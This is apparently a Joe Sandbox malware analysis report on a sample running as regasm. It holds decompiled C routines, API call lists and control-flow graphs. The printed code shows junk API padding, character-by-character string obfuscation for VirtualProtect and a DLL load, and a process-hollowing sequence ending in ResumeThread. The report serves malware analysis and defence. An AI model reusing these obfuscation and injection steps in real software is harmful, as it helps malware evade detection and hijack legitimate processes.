                                                                                  					__imp__SetCalendarInfoA(0, 0, 0, "nuvelokisejudosetowekojopoyoh");
                                                                                  					__imp__GetVolumeNameForVolumeMountPointW(0, 0, 0);
                                                                                  					__imp__GetConsoleAliasesLengthW(0);
                                                                                  				}
                                                                                  				_t51 = 0;
                                                                                  				L5:
                                                                                  				L5:
                                                                                  				if(_t51 < 0x1c860) {
                                                                                  					GetComboBoxInfo(0, 0);
                                                                                  					GetMessageExtraInfo();
                                                                                  					GetTickCount();
                                                                                  					GetBoundsRect(0, 0, 0);
                                                                                  				}
                                                                                  				if(_t51 <= 0x1e9d5cb8 || _v8 == 0xace7c8 || _v36 == 0xad642ec) {
                                                                                  					goto L10;
                                                                                  				}
                                                                                  				L11:
                                                                                  				E0040455F(_t52, _t62); // executed
                                                                                  				return 0;
                                                                                  				L10:
                                                                                  				_t51 = _t51 + 1;
                                                                                  				if(_t51 < 0x8e2a3c07) {
                                                                                  					goto L5;
                                                                                  				}
                                                                                  				goto L11;
                                                                                  			}


















                                                                                  0x004047eb
                                                                                  0x004047f3
                                                                                  0x004047f8
                                                                                  0x004047fd
                                                                                  0x004047fe
                                                                                  0x00404801
                                                                                  0x00404807
                                                                                  0x0040480d
                                                                                  0x00404818
                                                                                  0x00404825
                                                                                  0x00404831
                                                                                  0x00404839
                                                                                  0x00404846
                                                                                  0x00404854
                                                                                  0x0040485c
                                                                                  0x00404861
                                                                                  0x00404866
                                                                                  0x00404866
                                                                                  0x0040486b
                                                                                  0x00404870
                                                                                  0x00404876
                                                                                  0x0040487c
                                                                                  0x00404881
                                                                                  0x0040488a
                                                                                  0x00404891
                                                                                  0x0040489c
                                                                                  0x004048ad
                                                                                  0x004048b5
                                                                                  0x004048bb
                                                                                  0x004048c2
                                                                                  0x004048d1
                                                                                  0x004048d9
                                                                                  0x004048e4
                                                                                  0x004048eb
                                                                                  0x004048f6
                                                                                  0x004048fd
                                                                                  0x00404905
                                                                                  0x0040490b
                                                                                  0x0040490f
                                                                                  0x00404916
                                                                                  0x00404924
                                                                                  0x0040492d
                                                                                  0x00404934
                                                                                  0x00404934
                                                                                  0x0040493a
                                                                                  0x00000000
                                                                                  0x0040493c
                                                                                  0x00404942
                                                                                  0x00404946
                                                                                  0x0040494c
                                                                                  0x00404952
                                                                                  0x00404957
                                                                                  0x00404957
                                                                                  0x00404963
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00404980
                                                                                  0x00404980
                                                                                  0x0040498b
                                                                                  0x00404977
                                                                                  0x00404977
                                                                                  0x0040497e
                                                                                  0x00000000
                                                                                  0x00000000
                                                                                  0x00000000

                                                                                  APIs
                                                                                  • __vswprintf.LIBCMT ref: 004047F8
                                                                                    • Part of subcall function 00406B38: __vsprintf_l.LIBCMT ref: 00406B48
                                                                                  • _wscanf.LIBCMT ref: 00404801
                                                                                    • Part of subcall function 00406A9D: _vscanf.LIBCMT ref: 00406AB0
                                                                                    • Part of subcall function 004069E7: DeleteFileA.KERNEL32(?,?,0040480C,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004069EF
                                                                                    • Part of subcall function 004069E7: GetLastError.KERNEL32(?,0040480C,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 004069F9
                                                                                    • Part of subcall function 004069E7: __dosmaperr.LIBCMT ref: 00406A08
                                                                                    • Part of subcall function 0040572D: __EH_prolog.LIBCMT ref: 00405732
                                                                                    • Part of subcall function 00405CB5: __EH_prolog.LIBCMT ref: 00405C35
                                                                                  • _abort.LIBCMT ref: 00404861
                                                                                    • Part of subcall function 004068D0: __NMSG_WRITE.LIBCMT ref: 004068F1
                                                                                    • Part of subcall function 004068D0: _raise.LIBCMT ref: 00406902
                                                                                    • Part of subcall function 004068D0: _memset.LIBCMT ref: 0040699A
                                                                                    • Part of subcall function 004068D0: SetUnhandledExceptionFilter.KERNEL32 ref: 004069CC
                                                                                    • Part of subcall function 004068D0: UnhandledExceptionFilter.KERNEL32(?), ref: 004069D9
                                                                                    • Part of subcall function 0040683B: __getptd.LIBCMT ref: 00406847
                                                                                    • Part of subcall function 0040683B: _abort.LIBCMT ref: 00406869
                                                                                  • GlobalFindAtomW.KERNEL32 ref: 00404891
                                                                                  • LoadLibraryW.KERNEL32(noziyunejehugahukofinaxekarohorexoretazavadabiz), ref: 0040489C
                                                                                  • CreateDirectoryExA.KERNEL32(decudosilodematebugalufo,muceragumusitutidogabowu,00000000), ref: 004048AD
                                                                                  • GetProcessIoCounters.KERNEL32(00000000,00000000), ref: 004048B5
                                                                                  • GetOEMCP.KERNEL32 ref: 004048BB
                                                                                  • SetConsoleActiveScreenBuffer.KERNEL32(00000000), ref: 004048C2
                                                                                  • GetAtomNameW.KERNEL32(00000000,?,00000000), ref: 004048D1
                                                                                  • SetVolumeMountPointA.KERNEL32 ref: 004048D9
                                                                                  • SetConsoleTitleW.KERNEL32(boselolodurivog), ref: 004048E4
                                                                                  • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 004048EB
                                                                                  • GetMailslotInfo.KERNEL32 ref: 004048F6
                                                                                  • AddAtomW.KERNEL32(00000000), ref: 004048FD
                                                                                  • MoveFileW.KERNEL32 ref: 00404905
                                                                                  • GetTickCount.KERNEL32 ref: 0040490B
                                                                                  • TerminateThread.KERNEL32(00000000,00000000), ref: 0040490F
                                                                                  • GetModuleHandleA.KERNEL32(00000000), ref: 00404916
                                                                                  • SetCalendarInfoA.KERNEL32 ref: 00404924
                                                                                  • GetVolumeNameForVolumeMountPointW.KERNEL32(00000000,00000000,00000000), ref: 0040492D
                                                                                  • GetConsoleAliasesLengthW.KERNEL32 ref: 00404934
                                                                                  • GetComboBoxInfo.USER32 ref: 00404946
                                                                                  • GetMessageExtraInfo.USER32 ref: 0040494C
                                                                                  • GetTickCount.KERNEL32 ref: 00404952
                                                                                  • GetBoundsRect.GDI32(00000000,00000000,00000000), ref: 00404957
                                                                                  Strings
                                                                                  • nuvelokisejudosetowekojopoyoh, xrefs: 0040491C
                                                                                  • noziyunejehugahukofinaxekarohorexoretazavadabiz, xrefs: 00404897
                                                                                  • boselolodurivog, xrefs: 004048DF
                                                                                  • muceragumusitutidogabowu, xrefs: 004048A3
                                                                                  • decudosilodematebugalufo, xrefs: 004048A8
                                                                                  • ruwey, xrefs: 0040483E
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.928849580.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000007.00000002.928841784.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928960821.0000000000419000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928968084.000000000041B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929004607.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929031157.000000000058D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929042134.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Info$AtomConsoleVolume$CountExceptionFileFilterH_prologMountNamePointTickUnhandled_abort$ActiveAliasesBoundsBufferCalendarComboCountersCreateDeleteDirectoryEnvironmentErrorExtraFindFreeGlobalHandleLastLengthLibraryLoadMailslotMessageModuleMoveProcessRectScreenStringsTerminateThreadTitle__dosmaperr__getptd__vsprintf_l__vswprintf_memset_raise_vscanf_wscanf
                                                                                  • String ID: boselolodurivog$decudosilodematebugalufo$muceragumusitutidogabowu$noziyunejehugahukofinaxekarohorexoretazavadabiz$nuvelokisejudosetowekojopoyoh$ruwey
                                                                                  • API String ID: 3829664790-3130840315
                                                                                  • Opcode ID: de2ef69d1bf5a1dd19be70b89b294797a90e7f1b9893a45dc10249e2766bf563
                                                                                  • Instruction ID: 6505baa8f4c4109fb5ae8c80d5d9c81ddd7811c781676d38f005bae0d5a97073
                                                                                  • Opcode Fuzzy Hash: de2ef69d1bf5a1dd19be70b89b294797a90e7f1b9893a45dc10249e2766bf563
                                                                                  • Instruction Fuzzy Hash: A2414C71402524ABC715BBA2DE4DDDF3B6CEE5A355710003AF646B50B1CB381646CBBE
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  APIs
                                                                                  • VirtualAlloc.KERNELBASE(00000000,00002800,00001000,00000004), ref: 001B0156
                                                                                  • GetModuleFileNameA.KERNELBASE(00000000,?,00002800), ref: 001B016C
                                                                                  • CreateProcessA.KERNEL32(?,00000000), ref: 001B0255
                                                                                  • VirtualFree.KERNELBASE(?,00000000,00008000), ref: 001B0270
                                                                                  • VirtualAlloc.KERNELBASE(00000000,00000004,00001000,00000004), ref: 001B0283
                                                                                  • ReadProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 001B02C8
                                                                                  • NtUnmapViewOfSection.NTDLL(00000000,?), ref: 001B02E3
                                                                                  • VirtualAllocEx.KERNELBASE(00000000,?,?,00003000,00000040), ref: 001B0304
                                                                                  • NtWriteVirtualMemory.NTDLL(00000000,?,?,00000000,00000000), ref: 001B032A
                                                                                  • NtWriteVirtualMemory.NTDLL(00000000,00000000,?,00000002,00000000), ref: 001B0399
                                                                                  • WriteProcessMemory.KERNELBASE(00000000,?,?,00000004,00000000), ref: 001B03BF
                                                                                  • Wow64SetThreadContext.KERNEL32(00000000,?), ref: 001B03E1
                                                                                  • ResumeThread.KERNELBASE(00000000), ref: 001B03ED
                                                                                  • CloseHandle.KERNELBASE(00000000), ref: 001B03F9
                                                                                  • ExitProcess.KERNELBASE(00000000), ref: 001B0412
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.928387918.00000000001B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_1b0000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: Virtual$MemoryProcess$AllocWrite$Thread$CloseContextCreateExitFileFreeHandleModuleNameReadResumeSectionUnmapViewWow64
                                                                                  • String ID:
                                                                                  • API String ID: 3514283409-0
                                                                                  • Opcode ID: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                  • Instruction ID: e844b325a5245a22eb84d7703391371a7a06ea3d086bfb5d1a7bbd88632aaa41
                                                                                  • Opcode Fuzzy Hash: ec80134effe49fee59cfb16798ca45a1398515b3278bf894a8b0bf22fdce02bc
                                                                                  • Instruction Fuzzy Hash: 69B1B674A00208AFDB44CF98C895F9EBBB5BF88314F248158E509AB395D771AE45CF94
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 128 2dcedf-2dcef8 129 2dcefa-2dcefc 128->129 130 2dcefe 129->130 131 2dcf03-2dcf0f CreateToolhelp32Snapshot 129->131 130->131 132 2dcf1f-2dcf2c Module32First 131->132 133 2dcf11-2dcf17 131->133 134 2dcf2e-2dcf2f call 2dcb9e 132->134 135 2dcf35-2dcf3d 132->135 133->132 138 2dcf19-2dcf1d 133->138 139 2dcf34 134->139 138->129 138->132 139->135
                                                                                  APIs
                                                                                  • CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 002DCF07
                                                                                  • Module32First.KERNEL32(00000000,00000224), ref: 002DCF27
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.928771662.00000000002D8000.00000040.00000020.00020000.00000000.sdmp, Offset: 002D8000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_2d8000_regasm.jbxd
                                                                                  Yara matches
                                                                                  Similarity
                                                                                  • API ID: CreateFirstModule32SnapshotToolhelp32
                                                                                  • String ID:
                                                                                  • API String ID: 3833638111-0
                                                                                  • Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                  • Instruction ID: 76270764f95d50be668e2cb30fd26b05ac2fdfb64b31de8e7d12e82a102fb170
                                                                                  • Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
                                                                                  • Instruction Fuzzy Hash: D8F062321107126FD7202FB5A88DBAA76E9AF59764F20052AF643926C0DA70EC558A61
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 99 1b0420-1b04f8 101 1b04fa 99->101 102 1b04ff-1b053c CreateWindowExA 99->102 103 1b05aa-1b05ad 101->103 104 1b053e 102->104 105 1b0540-1b0558 PostMessageA 102->105 104->103 106 1b055f-1b0563 105->106 106->103 107 1b0565-1b0579 106->107 107->103 109 1b057b-1b0582 107->109 110 1b05a8 109->110 111 1b0584-1b0588 109->111 110->106 111->110 112 1b058a-1b0591 111->112 112->110 113 1b0593-1b0597 call 1b0110 112->113 115 1b059c-1b05a5 113->115 115->110
                                                                                  APIs
                                                                                  • CreateWindowExA.USER32(00000200,saodkfnosa9uin,mfoaskdfnoa,00CF0000,80000000,80000000,000003E8,000003E8,00000000,00000000,00000000,00000000), ref: 001B0533
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.928387918.00000000001B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_1b0000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: CreateWindow
                                                                                  • String ID: 0$d$mfoaskdfnoa$saodkfnosa9uin
                                                                                  • API String ID: 716092398-2341455598
                                                                                  • Opcode ID: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                  • Instruction ID: 04eff4232aff31db78c70daf9d79d73137fdbdb4e684738b39f5bef741287e30
                                                                                  • Opcode Fuzzy Hash: bb9b397fb3b679a7694c33bc0dbf232ca5c2d59a4e09fc52e4db1d59d2773c33
                                                                                  • Instruction Fuzzy Hash: 7E512B70D08388DEEB11CBD8C849BDEBFB66F15708F144058D5447F286C3BA5658CB66
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 116 40444b-40454a GetModuleHandleA GetProcAddress VirtualProtect
                                                                                  C-Code - Quality: 100%
                                                                                  			E0040444B(void* __eax, void* __ecx) {
                                                                                  				long _v8;
                                                                                  				struct HINSTANCE__* _t4;
                                                                                  				int _t6;
                                                                                  				CHAR* _t10;
                                                                                  
                                                                                  				_t10 = "VirtualProtect";
                                                                                  				"lProtect" = 0x33;
                                                                                  				"Protect" = 0x32;
                                                                                  				 *0x42c993 = 0x6c;
                                                                                  				M0042C98B = 0x6e;
                                                                                  				"VirtualProtect" = 0x6b;
                                                                                  				M0042C98C = 0x65;
                                                                                  				M0042C98D = 0x6c;
                                                                                  				M0042C989 = 0x65;
                                                                                  				M0042C98A = 0x72;
                                                                                  				"rotect" = 0x2e;
                                                                                  				 *0x42c991 = 0x64;
                                                                                  				 *0x42c992 = 0x6c;
                                                                                  				 *0x42c994 = 0;
                                                                                  				_t4 = GetModuleHandleA(_t10);
                                                                                  				 *0x58befc = _t4;
                                                                                  				 *0x42c993 = 0x65;
                                                                                  				M0042C989 = 0x69;
                                                                                  				M0042C98C = 0x75;
                                                                                  				"lProtect" = 0x6c;
                                                                                  				M0042C98D = 0x61;
                                                                                  				 *0x42c991 = 0x6f;
                                                                                  				 *0x42c995 = 0x74;
                                                                                  				"VirtualProtect" = 0x56;
                                                                                  				 *0x42c994 = 0x63;
                                                                                  				"Protect" = 0x50;
                                                                                  				 *0x42c996 = 0;
                                                                                  				M0042C98B = 0x74;
                                                                                  				 *0x42c992 = 0x74;
                                                                                  				M0042C98A = 0x72;
                                                                                  				"rotect" = 0x72;
                                                                                  				 *0x42c984 = GetProcAddress(_t4, _t10);
                                                                                  				_t6 = VirtualProtect( *0x57e7bc,  *0x58da80, 0x40,  &_v8); // executed
                                                                                  				return _t6;
                                                                                  			}







                                                                                  0x00404452
                                                                                  0x00404458
                                                                                  0x0040445f
                                                                                  0x00404466
                                                                                  0x0040446d
                                                                                  0x00404474
                                                                                  0x0040447b
                                                                                  0x00404482
                                                                                  0x00404489
                                                                                  0x00404490
                                                                                  0x00404497
                                                                                  0x0040449e
                                                                                  0x004044a5
                                                                                  0x004044ac
                                                                                  0x004044b3
                                                                                  0x004044bb
                                                                                  0x004044c0
                                                                                  0x004044c7
                                                                                  0x004044ce
                                                                                  0x004044d5
                                                                                  0x004044dc
                                                                                  0x004044e3
                                                                                  0x004044ea
                                                                                  0x004044f1
                                                                                  0x004044f8
                                                                                  0x004044ff
                                                                                  0x00404506
                                                                                  0x0040450d
                                                                                  0x00404514
                                                                                  0x0040451b
                                                                                  0x00404522
                                                                                  0x0040453b
                                                                                  0x00404546
                                                                                  0x0040454a

                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(VirtualProtect), ref: 004044B3
                                                                                  • GetProcAddress.KERNEL32(00000000,VirtualProtect), ref: 00404529
                                                                                  • VirtualProtect.KERNELBASE(00000040,?), ref: 00404546
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.928849580.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000007.00000002.928841784.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928960821.0000000000419000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928968084.000000000041B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929004607.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929031157.000000000058D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929042134.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProcProtectVirtual
                                                                                  • String ID: VirtualProtect
                                                                                  • API String ID: 2099061454-268857135
                                                                                  • Opcode ID: 9de5081c997c99e1923c0d230e3bc259cf6150a1bc75de3e405d7c6b04ca492e
                                                                                  • Instruction ID: 651622e9b6d47b592d54834f1512571f8c8276729906ccfa635e26d1feae2699
                                                                                  • Opcode Fuzzy Hash: 9de5081c997c99e1923c0d230e3bc259cf6150a1bc75de3e405d7c6b04ca492e
                                                                                  • Instruction Fuzzy Hash: E621E59060E6C0CCE322C739AC897197F955722708F8851A9C188472B2C3FB11DADB7E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 118 40444d-40454a GetModuleHandleA GetProcAddress VirtualProtect
                                                                                  C-Code - Quality: 100%
                                                                                  			E0040444D(void* __ecx) {
                                                                                  				long _v8;
                                                                                  				struct HINSTANCE__* _t2;
                                                                                  				int _t4;
                                                                                  				CHAR* _t8;
                                                                                  
                                                                                  				_t8 = "VirtualProtect";
                                                                                  				"lProtect" = 0x33;
                                                                                  				"Protect" = 0x32;
                                                                                  				 *0x42c993 = 0x6c;
                                                                                  				M0042C98B = 0x6e;
                                                                                  				"VirtualProtect" = 0x6b;
                                                                                  				M0042C98C = 0x65;
                                                                                  				M0042C98D = 0x6c;
                                                                                  				M0042C989 = 0x65;
                                                                                  				M0042C98A = 0x72;
                                                                                  				"rotect" = 0x2e;
                                                                                  				 *0x42c991 = 0x64;
                                                                                  				 *0x42c992 = 0x6c;
                                                                                  				 *0x42c994 = 0;
                                                                                  				_t2 = GetModuleHandleA(_t8);
                                                                                  				 *0x58befc = _t2;
                                                                                  				 *0x42c993 = 0x65;
                                                                                  				M0042C989 = 0x69;
                                                                                  				M0042C98C = 0x75;
                                                                                  				"lProtect" = 0x6c;
                                                                                  				M0042C98D = 0x61;
                                                                                  				 *0x42c991 = 0x6f;
                                                                                  				 *0x42c995 = 0x74;
                                                                                  				"VirtualProtect" = 0x56;
                                                                                  				 *0x42c994 = 0x63;
                                                                                  				"Protect" = 0x50;
                                                                                  				 *0x42c996 = 0;
                                                                                  				M0042C98B = 0x74;
                                                                                  				 *0x42c992 = 0x74;
                                                                                  				M0042C98A = 0x72;
                                                                                  				"rotect" = 0x72;
                                                                                  				 *0x42c984 = GetProcAddress(_t2, _t8);
                                                                                  				_t4 = VirtualProtect( *0x57e7bc,  *0x58da80, 0x40,  &_v8); // executed
                                                                                  				return _t4;
                                                                                  			}







                                                                                  0x00404452
                                                                                  0x00404458
                                                                                  0x0040445f
                                                                                  0x00404466
                                                                                  0x0040446d
                                                                                  0x00404474
                                                                                  0x0040447b
                                                                                  0x00404482
                                                                                  0x00404489
                                                                                  0x00404490
                                                                                  0x00404497
                                                                                  0x0040449e
                                                                                  0x004044a5
                                                                                  0x004044ac
                                                                                  0x004044b3
                                                                                  0x004044bb
                                                                                  0x004044c0
                                                                                  0x004044c7
                                                                                  0x004044ce
                                                                                  0x004044d5
                                                                                  0x004044dc
                                                                                  0x004044e3
                                                                                  0x004044ea
                                                                                  0x004044f1
                                                                                  0x004044f8
                                                                                  0x004044ff
                                                                                  0x00404506
                                                                                  0x0040450d
                                                                                  0x00404514
                                                                                  0x0040451b
                                                                                  0x00404522
                                                                                  0x0040453b
                                                                                  0x00404546
                                                                                  0x0040454a

                                                                                  APIs
                                                                                  • GetModuleHandleA.KERNEL32(VirtualProtect), ref: 004044B3
                                                                                  • GetProcAddress.KERNEL32(00000000,VirtualProtect), ref: 00404529
                                                                                  • VirtualProtect.KERNELBASE(00000040,?), ref: 00404546
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.928849580.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000007.00000002.928841784.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928960821.0000000000419000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928968084.000000000041B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929004607.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929031157.000000000058D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929042134.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: AddressHandleModuleProcProtectVirtual
                                                                                  • String ID: VirtualProtect
                                                                                  • API String ID: 2099061454-268857135
                                                                                  • Opcode ID: b85d97171b8ca333708cf1f09be01ec7a8c3cedf0ed0058bb8394f990fbd7661
                                                                                  • Instruction ID: 758da3b76f59338ef630aac5a08b7c025bbe92b25bcf0657f7aa4a7084f3bea8
                                                                                  • Opcode Fuzzy Hash: b85d97171b8ca333708cf1f09be01ec7a8c3cedf0ed0058bb8394f990fbd7661
                                                                                  • Instruction Fuzzy Hash: D721C59060E6C0CDE322C739AC897197E955722708F8851A98188472B2C7FB11DADB7E
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 119 1b05b0-1b05d5 120 1b05dc-1b05e0 119->120 121 1b061e-1b0621 120->121 122 1b05e2-1b05f5 GetFileAttributesA 120->122 123 1b0613-1b061c 122->123 124 1b05f7-1b05fe 122->124 123->120 124->123 125 1b0600-1b060b call 1b0420 124->125 127 1b0610 125->127 127->123
                                                                                  APIs
                                                                                  • GetFileAttributesA.KERNELBASE(apfHQ), ref: 001B05EC
                                                                                  Strings
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.928387918.00000000001B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 001B0000, based on PE: false
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_1b0000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: AttributesFile
                                                                                  • String ID: apfHQ$o
                                                                                  • API String ID: 3188754299-2999369273
                                                                                  • Opcode ID: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                  • Instruction ID: 33c47c271cdd9a6bd878b8d4df254921d54d752df5b655cf095d58733077aa63
                                                                                  • Opcode Fuzzy Hash: af0d3c0451304eea9a95bfbcf33a37b8699cda851cd8c30db079f59d0d7bd2d6
                                                                                  • Instruction Fuzzy Hash: D3011A70C0424CEADB15DBA8C5187EEBFB5AF45308F148099C4092B242D7B69B99CBA2
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 141 404008-40407e LoadLibraryW
                                                                                  C-Code - Quality: 100%
                                                                                  			E00404008() {
                                                                                  				short _t1;
                                                                                  				short _t2;
                                                                                  				short _t3;
                                                                                  				short _t5;
                                                                                  				short _t6;
                                                                                  				short _t7;
                                                                                  				short _t8;
                                                                                  				short _t9;
                                                                                  				short _t10;
                                                                                  				short _t11;
                                                                                  				short _t12;
                                                                                  				struct HINSTANCE__* _t13;
                                                                                  
                                                                                  				_t1 = 0x6d;
                                                                                  				 *0x58bf00 = _t1;
                                                                                  				_t2 = 0x73;
                                                                                  				 *0x58bf02 = _t2;
                                                                                  				_t3 = 0x33;
                                                                                  				 *0x58bf0a = _t3;
                                                                                  				 *0x58bf16 = 0;
                                                                                  				_t5 = 0x67;
                                                                                  				 *0x58bf08 = _t5;
                                                                                  				_t6 = 0x64;
                                                                                  				 *0x58bf10 = _t6;
                                                                                  				_t7 = 0x6d;
                                                                                  				 *0x58bf06 = _t7;
                                                                                  				_t8 = 0x6c;
                                                                                  				 *0x58bf12 = _t8;
                                                                                  				_t9 = 0x2e;
                                                                                  				 *0x58bf0e = _t9;
                                                                                  				_t10 = 0x6c;
                                                                                  				 *0x58bf14 = _t10;
                                                                                  				_t11 = 0x32;
                                                                                  				 *0x58bf0c = _t11;
                                                                                  				_t12 = 0x69;
                                                                                  				 *0x58bf04 = _t12; // executed
                                                                                  				_t13 = LoadLibraryW(0x58bf00); // executed
                                                                                  				return _t13;
                                                                                  			}















                                                                                  0x0040400a
                                                                                  0x0040400d
                                                                                  0x00404013
                                                                                  0x00404016
                                                                                  0x0040401c
                                                                                  0x0040401f
                                                                                  0x00404027
                                                                                  0x0040402d
                                                                                  0x00404030
                                                                                  0x00404036
                                                                                  0x00404039
                                                                                  0x0040403f
                                                                                  0x00404042
                                                                                  0x00404048
                                                                                  0x0040404b
                                                                                  0x00404051
                                                                                  0x00404054
                                                                                  0x0040405a
                                                                                  0x0040405d
                                                                                  0x00404063
                                                                                  0x00404066
                                                                                  0x0040406c
                                                                                  0x00404072
                                                                                  0x00404078
                                                                                  0x0040407e

                                                                                  APIs
                                                                                  • LoadLibraryW.KERNEL32(0058BF00,004046E8), ref: 00404078
                                                                                  Memory Dump Source
                                                                                  • Source File: 00000007.00000002.928849580.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                                                                  • Associated: 00000007.00000002.928841784.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928960821.0000000000419000.00000020.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.928968084.000000000041B000.00000008.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929004607.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929031157.000000000058D000.00000004.00000001.01000000.00000004.sdmpDownload File
                                                                                  • Associated: 00000007.00000002.929042134.0000000000590000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                  Joe Sandbox IDA Plugin
                                                                                  • Snapshot File: hcaresult_7_2_400000_regasm.jbxd
                                                                                  Similarity
                                                                                  • API ID: LibraryLoad
                                                                                  • String ID:
                                                                                  • API String ID: 1029625771-0
                                                                                  • Opcode ID: 2e313ce94393d0beb82ed0e768efc2d0aa9b5092b54185d284d59eaf6e46ac2e
                                                                                  • Instruction ID: 5e4ddb41dc59d40b9a1ffdcdc95ab11803906617d44634d0e4fbc62883a984be
                                                                                  • Opcode Fuzzy Hash: 2e313ce94393d0beb82ed0e768efc2d0aa9b5092b54185d284d59eaf6e46ac2e
                                                                                  • Instruction Fuzzy Hash: BFF0F135698384A9F6019BE0BD52B353329EF54B10F107807DF10EF5F5E3A20599AF59
                                                                                  Uniqueness

                                                                                  Uniqueness Score: -1.00%

                                                                                  Control-flow Graph

                                                                                  • Executed
                                                                                  • Not Executed
                                                                                  control_flow_graph 142 40d3b1-40d3d3 HeapCreate 143 40d3d5-40d3d6 142->143 144 40d3d7-40d3e0 142->144
                                                                                  C-Code - Quality: 100%
